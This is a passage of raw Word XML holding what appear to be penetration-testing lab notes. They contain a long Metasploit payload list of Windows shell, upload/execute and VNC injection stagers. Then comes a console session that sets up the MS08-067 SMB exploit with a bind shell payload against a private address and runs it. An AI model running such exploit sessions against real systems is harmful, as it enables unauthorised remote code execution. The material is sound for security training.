    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/bind_hidden_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/bind_ipv6_tcp                                          normal  Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/bind_ipv6_tcp_uuid                                     normal  Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/bind_nonx_tcp                                          normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/bind_tcp                                               normal  Windows Command Shell, Bind TCP Stager (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/bind_tcp_rc4                                           normal  Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/bind_tcp_uuid                                          normal  Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   windows/shell/reverse_ipv6_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (IPv6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/reverse_nonx_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/reverse_ord_tcp                                        normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/reverse_tcp_allports                                   normal  Windows Command Shell, Reverse All-Port TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/reverse_tcp_dns                                        normal  Windows Command Shell, Reverse TCP Stager (DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/reverse_tcp_rc4                                        normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/reverse_tcp_uuid                                       normal  Windows Command Shell, Reverse TCP Stager with UUID Support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell_bind_tcp                                               normal  Windows Command Shell, Bind TCP Inline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell_hidden_bind_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Inline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell_reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Inline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/speak_pwned                                                  normal  Windows Speech API - Say "You Got Pwned!"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/bind_hidden_ipknock_tcp                               normal  Windows Upload/Execute, Hidden Bind Ipknock TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/bind_hidden_tcp                                       normal  Windows Upload/Execute, Hidden Bind TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/bind_ipv6_tcp                                         normal  Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/bind_ipv6_tcp_uuid                                    normal  Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/bind_nonx_tcp                                         normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/bind_tcp                                              normal  Windows Upload/Execute, Bind TCP Stager (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/bind_tcp_rc4                                          normal  Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/bind_tcp_uuid                                         normal  Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/reverse_ipv6_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/reverse_nonx_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   windows/upexec/reverse_ord_tcp                                       normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/reverse_tcp                                           normal  Windows Upload/Execute, Reverse TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/reverse_tcp_allports                                  normal  Windows Upload/Execute, Reverse All-Port TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/reverse_tcp_dns                                       normal  Windows Upload/Execute, Reverse TCP Stager (DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/reverse_tcp_rc4                                       normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/upexec/reverse_tcp_uuid                                      normal  Windows Upload/Execute, Reverse TCP Stager with UUID Support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/bind_hidden_ipknock_tcp                            normal  VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/bind_hidden_tcp                                    normal  VNC Server (Reflective Injection), Hidden Bind TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/bind_ipv6_tcp                                      normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/bind_ipv6_tcp_uuid                                 normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/bind_nonx_tcp                                      normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/bind_tcp                                           normal  VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/bind_tcp_rc4                                       normal  VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/bind_tcp_uuid                                      normal  VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/reverse_hop_http                                   normal  VNC Server (Reflective Injection), Reverse Hop HTTP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/reverse_http                                       normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/reverse_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/reverse_nonx_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/reverse_ord_tcp                                    normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/reverse_tcp                                        normal  VNC Server (Reflective Injection), Reverse TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/reverse_tcp_allports                               normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/reverse_tcp_dns                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   windows/vncinject/reverse_tcp_rc4                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/reverse_tcp_uuid                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/vncinject/reverse_winhttp                                    normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8"/>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t>msf exploit(ms08_067_netapi) &gt; set payload windows/shell/bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t>payload =&gt; windows/shell/bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8"/>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8"/>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t>msf exploit(ms08_067_netapi) &gt; set RHOST 192.168.121.130</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t>RHOST =&gt; 192.168.121.130</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8"/>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t>msf exploit(ms08_067_netapi) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8"/>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t>Module options (exploit/windows/smb/ms08_067_netapi):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8"/>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   Name     Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   ----     ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   RHOST    192.168.121.130  yes       The target address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   RPORT    445              yes       Set the SMB service port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t>Payload options (windows/shell/bind_tcp):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8"/>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   Name      Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   ----      ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   LPORT     4444             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   RHOST     192.168.121.130  no        The target address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8"/>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000232E8">
        <w:t>msf exploit(ms08_067_netapi) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00023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4C"/>
    <w:rsid w:val="000232E8"/>
    <w:rsid w:val="0057514C"/>
    <w:rsid w:val="0060113C"/>
    <w:rsid w:val="00B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B06"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{39608444-7FF9-48C5-AE17-4041D302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3282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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-02-24T09:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-02-24T10:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>